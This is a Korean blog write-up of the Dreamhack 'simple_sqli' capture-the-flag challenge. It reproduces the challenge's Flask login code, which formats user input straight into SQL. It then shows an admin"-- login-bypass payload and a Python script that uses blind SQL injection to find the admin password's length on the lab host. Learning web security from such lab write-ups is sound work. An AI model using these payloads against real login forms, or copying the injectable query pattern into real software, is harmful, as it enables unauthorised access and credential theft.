[Dreamhack] simple_sqli write up - 티스토리

 

#!/usr/bin/python3
from flask import Flask, request, render_template, g
import sqlite3
import os
import binascii

app = Flask(__name__)
app.secret_key = os.urandom(32)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

DATABASE = "database.db"
if os.path.exists(DATABASE) == False:
    db = sqlite3.connect(DATABASE)
    db.execute('create table users(userid char(100), userpassword char(100));')
    db.execute(f'insert into users(userid, userpassword) values ("guest", "guest"), ("admin", "{binascii.hexlify(os.urandom(16)).decode("utf8")}");')
    db.commit()
    db.close()

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    db.row_factory = sqlite3.Row
    return db

def query_db(query, one=True):
    cur = get_db().execute(query)
    rv = cur.fetchall()
    cur.close()
    return (rv[0] if rv else None) if one else rv

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userid = request.form.get('userid')
        userpassword = request.form.get('userpassword')
        res = query_db(f'select * from users where userid="{userid}" and userpassword="{userpassword}"')
        if res:
            userid = res[0]
            if userid == 'admin':
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

app.run(host='0.0.0.0', port=8000)

 

 

아래와 같은 로그인 폼에서 sql injection을 일으켜서 admin으로 로그인하면 된다.

 

 

 

 

SQL Injection

---

일반적으로 조건문을 참으로 만들어서 admin으로 로그인할 수 있다.

 

admin"-- -> 해당 페이로드를 userid에 넣게 되면

 

select * from users where userid="admin"-- and userpassword="{userpassword}

 

👆 위와 같이 userid가 admin인 데이터를 user테이블에서 가져오게 된다. 뒤 데이터는 모두 주석처리가 된다.

 

 

 

 

Blind SQL Injection

---

admin의 비밀번호를 구해서 직접 로그인하는 Blind SQL Injection 방법이 있다.

 

비밀번호는 32자리이므로 수동으론 불가하기때문에 파이썬 스크립트를 작성해야한다.

 

그 전에 먼저, 로그인 요청 시 폼 구조를 파악해야한다.

 

로그인 창에서 개발자 도구의 Network탭에서 preservelog 체크박스를 클릭 후 guest로 로그인한다.

 

 

Form Data부분을 보면 userid: guest, userpassword: guest로 데이터가 넘어간 것을 볼 수 있다.

 

로그인 데이터가 어떤 형식으로 전송 되는지 확인 했으므로 이제 비밀번호의 길이를 구한 후 길이에 맞게 반복문을 반복시켜 비밀번호를 알아내면 된다.

 

 

import requests
import string

url = "http://host3.dreamhack.games:23785/login"

data = {
    "userid": ""
}

query = 'admin" and LENGTH(userpassword)={i}--'

for idx in range(1, 96):
    
    data["userid"] = query.format(i=idx)

    result = requests.post(url, data=data)
    if 'hello' in result.text:
        print('length is: ' + str(idx))
        break

 

 

👆 위 코드는 해당 문제의 비밀번호의 길이를 구할 수 있는 스크립트이다. 비밀번호는 아스키 문자 중 키보드로 입력할 수 있는 모든 것이 들어갈 수 있다. 알파벳과 숫자, 특수문자로 이루어진다. 이는 아스키 범위로 32부터 126까지의 모든 문자이기 때문에 총 95번의 반복을 해준다.

 

비밀번호 총 길이

 

 

이제 구한 길이를 바탕으로 비밀번호를 알아내는 스크립트를 작성하면 된다.

 

 

 

 

 

 

 

참일 경우 텍스트를 그대로 출력해도 flag를 얻을 수 있긴하다.